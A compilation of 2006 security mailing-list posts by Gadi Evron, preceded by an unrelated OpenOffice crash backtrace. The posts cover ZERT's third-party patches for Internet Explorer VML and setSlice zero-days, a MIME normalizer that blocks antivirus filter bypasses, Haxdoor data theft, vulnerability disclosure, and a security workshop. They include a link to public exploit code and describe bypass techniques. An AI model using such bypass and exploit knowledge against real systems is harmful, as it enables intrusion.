> /usr/lib/openoffice/program/libvcl645li.so(_ZN23ImplVCLExceptionHandler6signalEP13oslSignalInfo+0xb2)[0xb7df894e]
> /usr/lib/openoffice/program/libvos3gcc3.so(_ZN3vos28_cpp_OSignalHandler_FunctionEPvP13oslSignalInfo+0x18)[0xb750b2f6]
> /usr/lib/openoffice/program/libvos3gcc3.so(_Z24_OSignalHandler_FunctionPvP13oslSignalInfo+0x26)[0xb750b2d6]
> /usr/lib/openoffice/program/libsal.so.3[0xb72e1496]
> /usr/lib/openoffice/program/libsal.so.3[0xb72e1625]
> [0xe420]
> /lib/tls/libc.so.6(abort+0x1d2)[0xb6c2cfa2]
> /usr/lib/openoffice/program/libvcl645li.so[0xb7fadd3b]
> /usr/lib/openoffice/program/libvcl645li.so(_ZN11Application5AbortERK6String+0x1f)[0xb7df3997]
> /usr/lib/openoffice/program/soffice.bin(_ZN7desktop7Desktop9ExceptionEt
> +0x174)[0x806314a]
> /usr/lib/openoffice/program/libsfx645li.so(_Z18SfxNewHandler_Implv
> +0x60)[0xb3042e46]
> /usr/lib/openoffice/program/soffice.bin[0x80869cf]
> /usr/lib/openoffice/program/soffice.bin(_Znaj+0x2f)[0x8086b61]
> /usr/lib/openoffice/program/libsw645li.so[0xb1422b5e]
> /usr/lib/openoffice/program/libsw645li.so[0xb1422a69]
> /usr/lib/openoffice/program/libsw645li.so[0xb14243f2]
> /usr/lib/openoffice/program/libsw645li.so[0xb1425022]
> /usr/lib/openoffice/program/libsw645li.so[0xb14212df]
> /usr/lib/openoffice/program/libsw645li.so[0xb13e59c0]
> /usr/lib/openoffice/program/libsw645li.so[0xb13e7f7c]
> /usr/lib/openoffice/program/libsw645li.so[0xb13e813d]
> /usr/lib/openoffice/program/libsw645li.so[0xb12cc513]
> /usr/lib/openoffice/program/libsw645li.so[0xb147cc4e]
> /usr/lib/openoffice/program/libsfx645li.so(_ZN14SfxObjectShell6DoLoadEP9SfxMedium+0xa15)[0xb2eae69d]
> /usr/lib/openoffice/program/libsfx645li.so(_ZN20LoadEnvironment_Impl4LoadEPK16SfxObjectFactory+0x563)[0xb2e2d1ef]
> /usr/lib/openoffice/program/libsfx645li.so(_ZN20LoadEnvironment_Impl17LoadDataAvailableEv+0x1f3)[0xb2e2eb8d]
> /usr/lib/openoffice/program/libsfx645li.so(_ZN20LoadEnvironment_Impl17LoadDataAvailableEv+0x39e)[0xb2e2ed38]
> /usr/lib/openoffice/program/libsfx645li.so(_ZN20LoadEnvironment_Impl5StartEv+0x7ca)[0xb2e2c3ba]
> /usr/lib/openoffice/program/libsfx645li.so(_ZN19SfxFrameLoader_Impl4loadERKN3com3sun4star3uno8SequenceINS2_5beans13PropertyValueEEERKNS3_9ReferenceINS2_5frame6XFrameEEE+0x2361)[0xb2f10bb3]
> /usr/lib/openoffice/program/libfwk645li.so[0xb224207a]
> /usr/lib/openoffice/program/libfwk645li.so[0xb22485e4]
> /usr/lib/openoffice/program/libfwk645li.so[0xb223bb1c]
> /usr/lib/openoffice/program/libfwk645li.so[0xb225662c]
> /usr/lib/openoffice/program/soffice.bin(_ZN7desktop15DispatchWatcher23executeDispatchRequestsERKN4_STL6vectorINS0_15DispatchRequestENS1_9allocatorIS3_+0x230c)[0x807a34c]
> /usr/lib/openoffice/program/soffice.bin(_ZN7desktop15OfficeIPCThread22ExecuteCmdLineRequestsERNS_23ProcessDocumentsRequestE+0x17f)[0x807138d]
> /usr/lib/openoffice/program/soffice.bin(_ZN7desktop7Desktop11OpenClientsEv+0x1ef6)[0x80681d4]
> /usr/lib/openoffice/program/soffice.bin(_ZN7desktop7Desktop16OpenClients_ImplEPv+0x11)[0x8065ee7]
> /usr/lib/openoffice/program/soffice.bin(_ZN7desktop7Desktop24LinkStubOpenClients_ImplEPvS1_+0x18)[0x8065ed2]
> /usr/lib/openoffice/program/libvcl645li.so[0xb7f49674]
> /usr/lib/openoffice/program/libvcl645li.so(_Z19ImplWindowFrameProcPvP8SalFrametPKv+0x44e)[0xb7f49fc2]
> /usr/lib/openoffice/program/libvclplug_gen645li.so(_ZN10SalDisplay21DispatchInternalEventEv+0xd9)[0xb618ad45]
> /usr/lib/o

looking for security community input

[Gadi Evron]

Hi guys.

This January a couple hundred people from the net-ops world, anti virus,
anti spam, law enforcement, etc. are getting together.

I'd appreciate if any of you can send me input (off list, if not relevant
to generate discussion) on what the security community at large, rather 
than just the security operations community, sees and is pre-occupied by.

Specifically on subjects such as:
1. Attacks.
2. Law enforcement.
3. DDoS.
4. Botnets.
5. Financial fraud.
6. Spam.
7. End users (bots?)
8. Corporate espionage.
9. Incident response
10. Your topic here?

And whats specifically you've had issues with and/or are looking for
solutions for or for what others are doing when it comes to security and
security related issues. Please note, this is about security operations
and Internet-wide threats which affect us all, more than local corporate
security issues.

We will relay information back after the workshop, likely in early
February.

To ask specific questions and/or direct us in specific directions, pick
and choose:
http://isotf.org/isoi2.html

Thanks,

Gadi.

Re: Multiple Vendor Unusual MIME Encoding Content Filter Bypass

[Gadi Evron]

On Wed, 6 Dec 2006, Hendrik Weimer wrote:
> Several e-mail virus scanners can be tricked into passing an EICAR
> test file if the following conditions are met:
> 
> 1. the EICAR file is encoded in Base64 including characters not in the
>standard alphabet (e.g. whitespaces) and
> 2. the part containing the EICAR file is nested within one or several
>levels of multipart/mixed content.

Victor Duchovni agreed for me to post what he employs to avoid such
issues. This is in some ways similar to a limited application firewall for
SMTP, which is not spam specific and MIME only. Yes, I know, SMTP
application firewalls are the 4th buzzword down the road, give it a couple 
of years.

Victor's information:

I have a MIME normalizer in front of the A/V engine. Non-conformant
Base64 entities are made conformant or neutered (super-encoded via QP
so that the user receives the base64 text itself as the entity payload).


In:
CT: application/octet-stream
CD: attachment; filename=foo.dat
CTE: base64

AA AA

Out:
CT: application/octet-stream
CD: attachment; filename=foo.dat
CTE: base64



In:
CT: application/octet-stream
CD: attachment; filename=foo.dat
CTE: base64



Out:
CT: text/plain
CD: attachment; filename=mime-source.txt
CTE: quoted-printable

=20AA=01AA


Solves all such problems before the vulnerability is found in the
A/V engine.

The MIME normalizer does more, defending other possible
bypass scenarios, but I not able to describe the full feature-set
at this time. It was written and deployeed in Dec 1999.
--- End quote.

All the above is Viktor's.

Gadi Evron.

unreliable vulnerability reports en-masee [was:Re: vulnerability in Symantec products]

[Gadi Evron]

On Fri, 27 Oct 2006 [EMAIL PROTECTED] wrote:
> Ummm are you for real? You are posting this as a vulnerability?
> 
> Chances are if they have trojaned or gained priviledged access to your 
> workstation it shouldnt be
> to much trouble to alter config of firewall or skirt outbound connectivity.
> 
> Unwise default config, perhaps. Vulnerability ... naah.

Jay, a few months ago someone published a DoS vulnerability that is
triggered when "you run out of hard disk space". Pfft.

Nothing really surprises me anymore. The quality of advisories and QA
people do seems to be dropping, especially when it comes to File
Inclusions. The level of false positives posted in the last couple of
weeks is staggering.

Folks use Google Code Search to find vulns, and don't notice they are
fixed 3 lines above the "bug" and that three lines below, there is
another one.

Last week, one of these File Inclusion vulns worked only if you disabled
two security functions that work by default...

Str0ke from milw0rm (= one of the only places, with SecuriTeam, where you
can find a free and public exploit code, so they go over all of these much
like we at SecuriTeam do).
Str0ke recently spoke of how this is becoming an issue, and how all these
exploits have to be verified on systems non of us have, while little to no
research went into them to begin with.

Up to this day, vulnerabilities and exploits would be researched to a
level, and released AS-IS. This is fast becoming impracticle.

Noam, at SecuriTeam wrote a blog entry on much the same, with code samples
(that go on in the comments) called "5 minutes of glory".

http://blogs.securiteam.com/index.php/archives/700

If the S/N ratio of ADVISORIES rather than ML traffic becomes even lower
due to unreliable submissions, our jobs will indeed become much, much harder.

Gadi.

> 
> Jay

[funsec] Haxdoor: UK Police Count 8, 500 Victims in Data Theft (So Far) (fwd)

[Gadi Evron]

So, here we go. Real-life uses for vulnerabilities.

Below is an example of just ONE "drop-zone" server in the
United States, which has "600 financial companies and banks".

Several gigs of data.

How do these things work?

They get installed by the use of a web vulnerability, an email attachment
of network scanning, utilizing several vulnerabilitie.

One drop zone, and all this noise gets made. I am very happy to hear that
the UK police (which are good people) are doing something about this,
however, banks, eCommerce sites, dating sites, etc. all get attacked by
these things, by the users being infected.

These trojan horses use rootkit technology, with a hook, using man in the
middle attacks to bypass the SSL encryption, and steal any HTTPS
credentials they come across.

These things are so wide-spread, this news item made me raise my eye-brow,
at first.

So, knowing full-well security is out of our hands, and relies on the
security of our users. Knowing full-well that the same technology can be
used to bypass 2-factor authentication, how do organizations handle their
own security, if they are to have clients?

The point is, though, that this is a well planned operation, with new
samples being released with new vulnerabilities to exploit,
constantly. This should not be considered a "one time cease" or a "lost
laptop containing private data".

This is what vulnerabilities are about - the damage and operations they
are used for.

Gadi.

-- Forwarded message --
Date: Tue, 24 Oct 2006 21:24:20 GMT
From: Fergie <[EMAIL PROTECTED]>
To: funsec@linuxbox.org
Subject: [funsec] Haxdoor: UK Police Count 8,
 500 Victims in Data Theft (So Far)

Via InfoWorld.

[snip]

British electronic-crime detectives are investigating a massive data
theft operation that stole sensitive information from 8,500 people in
the U.K. and others in some 60 countries, officials said Tuesday.

In total, cybercriminals targeted 600 financial companies and banks,
according to U.K. authorities, who have worked over the past week to
identify and notify victims.

Through intelligence sources, U.K. police were given several gigabytes
of data -- around 130,00 files -- that came from a server in the U.S.,
said Charlie McMurdie, detective chief inspector for the Specialist
Crime Directorate e-Crime Unit of the London Metropolitan Police. Most
of the data related to financial information, she said.

The data was collected by a malicious software program nicknamed
Haxdoor that infected victims' computers. Some 2,300 machines were
located in the U.K. McMurdie said.

[snip]

More:
http://www.infoworld.com/article/06/10/24/HNukdatatheft_1.html

- ferg


--
"Fergie", a.k.a. Paul Ferguson
 Engineering Architecture for the Internet
 fergdawg(at)netzero.net
 ferg's tech blog: http://fergdawg.blogspot.com/


___
Fun and Misc security discussion for OT posts.
https://linuxbox.org/cgi-bin/mailman/listinfo/funsec
Note: funsec is a public and open mailing list.

Re: Yahoo! Messenger Service 18 Remote Buffer Overflow Vulnerability

[Gadi Evron]

>
> Does anyone have more information on this issue?
>

Yes. SecuriTeam is currently assisting a researcher with reporting this
issue to Yahoo! security.

Yahoo! security responded in record time, as they often do, and are
working to resolve this potential security vulnerability.

An official report with full credit to the researcher who discovered it
will be released when the incident has been resolved.

A similar vulnerability was reported on the mailing lists a few months
ago, which has not been fixed. SecuriTeam assisted the researcher and
Yahoo! responded and fixed the issue in a matter of a day. Yahoo! are very
capable with security vulnerabilities in their software.

Thanks,

Gadi.

> snip
> http://www.securityfocus.com/bid/20625/discuss
> Yahoo! Messenger is prone to a remote buffer-overflow vulnerability
> because it fails to properly bounds-check user-supplied data before
> copying it to an insufficiently sized memory buffer.
> 
> This vulnerability allows remote attackers to execute arbitrary machine
> code in the context of the affected application. Failed exploit attempts
> will likely crash the server, denying further service to legitimate
> users.
> 
> Yahoo! Messenger 8 with Voice is vulnerable.
> snip
> 
> 
> I could not find this vulnerability reported on any other place than
> bugtraq (say Secunia, iDefense, ISC).
> 
> 
> Thanks,
> 
> - Siddhartha
> 

ISOI II - a DA Workshop (announcement and CFP)

[Gadi Evron]

[Apologies to those who receive this message multiple times]

The second Internet Security Operations and Intelligence (ISOI) DA
workshop will take place on the 25th and 26th of January, 2007. It will be
hosted by the Microsoft Corporation, in Redmond WA. An after-party dinner
will be hosted by Trendmicro.

This workshop's main topic is BotMaster Operational Tactics - the use of
vulnerabilities and 0day exploits in the wild. (by spyware, phishing and
botnets for their businesses).
Secondary subjects include DDoS, phishing and general botnet subjects.

The workshop's purpose is to bring together members of the Internet 
security operations community at large and DA and MWP specifically, and
share information, as well as plan our future operations.
It is open only to the following vetted communities: DA, MWP (and sister
communities such as routesec), OARC, NSP-SEC, FIRST. MAAWG, anti virus 
vetted groups and the honey net project.

Among the attendees are:
Professionals from Internet Service Providers (ISPs), Anti Virus vendors,
Anti Spam vendors and projects, CERT teams, Law Enforcement, Academia,
etc. coming together to work on the most recent technology, intelligence
and operations being done online today for the security of the Internet.

No reporters are allowed.

CFP:
The call for papers is now open to the public. The main subject of
interest is vulnerabilities and 0day exploits used in the wild. Secondary
subjects are DDoS, phishing and general botnet subjects.

Submission is simple, email us directly with your topic and some data to
back it up by December 10th, to [EMAIL PROTECTED]

For more information please visit:
http://isotf.org/isoi2.html

For the agenda of our previous workshop hosted by Cisco Systems, Inc.,
please visit:
http://isotf.org/isoi.html

Gadi Evron,
ISOI/DA coordinator and organizer.

Re: [funsec] Technical Paper on the ZERT Patch and VML [was: Re: ZERT patch for setSlice()]

[Gadi Evron]

On Wed, 4 Oct 2006, Alexander Sotirov wrote:
> Rewriting the entire function in asm is a lot of unnecessary effort. Why 
> didn't
> you add a simple length check and a 5-byte jump to it in the vulnerable 
> function?
> 
> Patch right before the call to _IE5_SHADETYPE_TEXT::TOKENS::Ptok, check the
> length of the string, and you're done. Or you can patch the copy loop and 
> count
> the characters there. It's easier and safer than rewriting the function.

Hi. Thank you very much for your valued input.

What you say makes sense (patching by staging the size check somewhere in
the binary and then just adding a 5-byte jump/call to it before or within
the Ptok() function). We believe the less we overwrite, the less chance
there is that something will go wrong.

However, we did experiment with this. It is the approach we at ZERT took
with an earlier patch version in C that Michael Hale Ligh wrote, before
Gil Dabah's final version, and found that while it worked nicely on one
version of vgx.dll, it was a big problem making it universal for all
versions. The reason was that the one Michael tested with had an align 20
(20 free bytes) where the size-check could be staged. None of the other
DLLs had this available. Nor did the others have any free space at the end
of a segment. The tool we conventionally use to add new sections to PE
files produced an error because there wasn't enough room in the PE header
for a new section.

We started discussing solutions to get around this at the time, but then
instead of breaking the speed of light which some claim is impossible 
( :) ) we did what hackers do and just went to warp speed.

So, even if all versions had that align 20 of free space they would no
doubt be in different offsets of the file, so we would need a specific
configuration for each version, and this would be much messier than the
way we actually implemented the patch.

A good engineer doesn't blame his tools though, which sounds like what we
just did.

Limited space in the binary was the biggest issue, and we are working on
that being solved for future incidents we are called to respond to by
developing better tools to better utilize these slicks/gaps(/whatever you
call it) in the PE. This would allow for any amount of patch code to be
staged.

For a higher success rate and the purpose of being as generic as possible,
patches are supposed to be as small as possible.

Code crunching, however, is something which should not be discounted. In
our first patch (and especially in our unsupported systems patch) this is
very apparent. The effort was not unnecessary, and not really an effort
for a better quality of our work. Putting that aside, the original code
(before further development and QA) was done in less than 5
minutes. ROI-wise, it was worth it. Thank you though.

As before, we explain more of the process in the paper we released to the
public:
http://isotf.org/zert/papers/vml-details-20061004.pdf

Gadi.

Technical Paper on the ZERT Patch and VML [was: Re: ZERT patch for setSlice()]

[Gadi Evron]

> So how is this a patch when you are simply automating a simple work
> around?
> 
> If this can be called a patch then we should be able to say that
> Microsoft released a patch in their bulletin on this issue where they
> describe exactly how to set the killbit.
> 
> A *real* patch would actually address the vulnerable code.

Our (ZERT's) VML patch was what you refer to as "real". There was space
issue with not enough bytes to play with, so Gil Dabah, one of our
members, re-wrote the vulnerable function in Yasm, compiled it, and
hard-coded the compiled code into the binary, with room to spare, saving
functionality. Code crunching is back in style. :)

You can read about the vulnerability, the patch and the Microsoft patch
here (technical + ASM and C code):

http://zert.isotf.org/papers/vml-details-20060928.pdf

As to the setSlice() patch... an alternative does not necessarily mean
intrusive. A patch for the setSlice() vulnerability was already provided
by Determina which was very nice and very professional. It used some
ideas we developed ourselves - we liked it - it was a very efficient
patch.
It came out as commercial, though. We release our work under GPL
and Creative Commons with full source code available.

In this incident (ZERT2006-02) We provided with an automation of the
workaround, to make it simple for users and organizations which are
interested, and for whom a third party patch is too risky for various
reasons ranging from support to liability, to protect themselves.

As an example, Network admins can easily use the console version of
ZProtector to run in the login script of a domain. ZProtector is not a
patch per se, it is an automated kill bit software which gets updated as
new unpatched vulnerabilities and 0days are disclosed/discovered/reported.

For more information, you can visit the Zeroday Emergency Response Team
web site at: http://isotf.org/zert/

IMPORTANT: third party patches should always be considered a last resort,
and used only if the other solutions, if such exist, are not good for
you. I like the idea of having an alternative.

ZERT withdrew its VML patch as soon as Micorosft released the official
patch. They did really good work on it. Kudos to the guys at MSRC.

Thanks,

Gadi.

ZERT patch for setSlice()

[Gadi Evron]

A ZERT patch has now been released and is avilable on our site (
http://isotf.org/zert/ ).

A full patch (for limited Windows versions, which is built very nicely) is
available from Determina.

Our patch automates the Microsoft suggested workaround.

Thanks,

Gadi.

setSlice exploited in the wild - massively

[Gadi Evron]

Exploit code is available publicly:
http://www.milw0rm.com/exploits/2440

SANS diary:
http://isc.sans.org/diary.php?storyid=1742

And this is so massively exploited, it makes VML look cute. There's a
rootkit, some other malware, and haxdor! (a phishing trojan horse)

Thanks to Roger Thompson at explabs.com for first reporting it.

Gadi.

tech support being flooded due to IE 0day

[Gadi Evron]

For orgs which are not ISP's, I just emailed this to nanog.
-

Hi guys, several ISP's are experiencing a flood of calls from customers
who get failed installations of the recent IE 0day - VML - (vgx.dll).

If you are getting such floods too, this is why.

This is currently discussed on the botnets@ list, as raised by Cox, and I
figured I will float it out here.

No patch is currently available from Microsoft, workarounds are available.

Gadi.

Re: ZERT patch [was: 0day for IE (Disabling Javascript no longer a fix)]

[Gadi Evron]

On Mon, 25 Sep 2006, Susan Bradley, CPA aka Ebitz - SBS Rocks [MVP] wrote:
> Jesper's Blog : More options on protecting against recent IE 
> vulnerabilities on a domain:
> http://msinfluentials.com/blogs/jesper/archive/2006/09/22/More-options-on-protecting-against-the-VML-vulnerability-on-a-domain.aspx
> 
> I like that option better.  Leaves me supported and honestly I've not 
> seen anything that I'm running that's used VML or freaked since I've 
> done that?

The patch is available, but if the workaround works for you, you should
definitely use that. All things being even, third party patches should be
a last resort.

Gadi.

> 
> Gadi Evron wrote:
> > On Sun, 24 Sep 2006, Bill Stout wrote:
> >   
> >> http://sunbeltblog.blogspot.com/2006/09/seen-in-wild-zero-day-exploit-be
> >> ing.html 
> >> "This exploit can be mitigated by turning off Javascripting. 
> >>
> >> Update: Turning off Javascripting is no longer a valid mitigation. A
> >> valid mitigation is unregistering the VML dll. "
> >> 
> >
> > There is, of course, the ZERT (Zeroday Emergency Response Team) patch,
> > available to those who choose to use it.
> > Along with source code, testing methodology, etc.
> >
> > Naturally a vendor patch is BETTER, this is merely an alternative that can
> > be used, right now, by those who choose to do so.
> >
> > http://www.eweek.com/article2/0,1895,2019162,00.asp
> > http://isotf.org/zert/
> >
> > Richard wrote an interesting blog entry on it:
> > http://taosecurity.blogspot.com/2006/09/zert-evolution.html
> >
> >   
> >> Bill Stout
> >> 
> >
> > Gadi.
> >
> >
> >   
> 
> -- 
> Letting your vendors set your risk analysis these days?  
> http://www.threatcode.com
> 
> If you are a SBSer and you don't subscribe to the SBS Blog... man ... I will 
> hunt you down...
> http://blogs.technet.com/sbs
> 

ZERT patch [was: 0day for IE (Disabling Javascript no longer a fix)]

[Gadi Evron]

On Sun, 24 Sep 2006, Bill Stout wrote:
> http://sunbeltblog.blogspot.com/2006/09/seen-in-wild-zero-day-exploit-be
> ing.html 
> "This exploit can be mitigated by turning off Javascripting. 
> 
> Update: Turning off Javascripting is no longer a valid mitigation. A
> valid mitigation is unregistering the VML dll. "

There is, of course, the ZERT (Zeroday Emergency Response Team) patch,
available to those who choose to use it.
Along with source code, testing methodology, etc.

Naturally a vendor patch is BETTER, this is merely an alternative that can
be used, right now, by those who choose to do so.

http://www.eweek.com/article2/0,1895,2019162,00.asp
http://isotf.org/zert/

Richard wrote an interesting blog entry on it:
http://taosecurity.blogspot.com/2006/09/zert-evolution.html

> 
> Bill Stout

Gadi.

Yet another 0day for IE

[Gadi Evron]

Sunbelt Software released a warning on a new IE 0day they detected
in-the-wild, to quote them:
"The exploit uses a bug in VML in Internet Explorer to overflow a buffer
and inject shellcode.   It is currently on and off again at a number of
sites. 
Security researchers at Microsoft have been informed. This story is
developing and research is ongoing.   Security professionals can contact
me for collaboration or further information. This exploit can be mitigated
by turning off Javascripting."

They also notified some closed and vetted security information sharing
groups on the matter, with further details. You can find their blog entry
here:
http://sunbeltblog.blogspot.com/2006/09/seen-in-wild-zero-day-exploit-being.html

That's that.

Why do I call it a 0day? Because it has indeed been used in-the-wild
before it was publicly discovered. People are CURRENTLY and for a while
now, being exploited.

Lately we call every exploit being released in full disclosure mode a
0day. That's a 1-day or at least it has to be from now on, as there are
just too many of those and there are more to come.

This trend started with Websense detecting an IE 0day (not really IE
- WMF) used in-the-wild by spyware, to infect users.
"Responsible disclosure" is important, but when it takes so long to get a
response or a fix with "Irresponsible vendors", and with so much money to
be made by not disclosing vulnerabilities at all - it is becoming
passe. New exploits don't need to be gleamed from patches or feared in
full disclosure. Someone just pays for a 0day.. it's their business and
they invest in it.

So:
1. Lots more coming.
2. Please call it a 1-day if it's full disclosure mode, and 0day if it
has been seen in-the-wild.

The motivation has now moved from "let's be responsible" or "let's have
fun" to "let's make money" or "let's stop waiting and be mocked by
irresponsible vendors". This is not about everybody, it's about how things are.

Even idefense and zdi can't pay enough when compared with people who make
money from what the 0day gives them - exploited users and a money making
botnet.

Thanks,

Gadi.